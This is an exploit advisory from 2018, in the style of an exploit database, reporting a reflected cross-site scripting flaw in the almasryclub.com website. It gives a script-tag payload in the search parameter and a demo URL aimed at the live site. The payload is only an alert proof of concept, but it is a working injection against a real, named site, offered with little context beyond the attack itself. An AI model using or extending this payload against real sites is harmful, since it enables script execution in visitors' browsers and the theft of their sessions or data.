# Exploit title: almasryclub - Cross Site Scripting ( XSS ) Vulnerability
# Date: 2018-03-19
# Exploit Author: Elsfa7-110 ( mazoka433@gmail.com )
Vendor Homepage: https://www.almasryclub.com
# Category: Web Application
# Dork: N/A
# =============================
# Description:
# I discovered a XSS vulnerability in almasryclub. This vulnerability allows bad guy executes javascript commands on
# target. In this target, attacker can enter his javascript command through url. like this :
# http://Server/s=<script>alert("Elsfa7")</script>
#=============================
Demo :
# http://almasryclub.com/?s=<script>alert("Elsfa7")</script>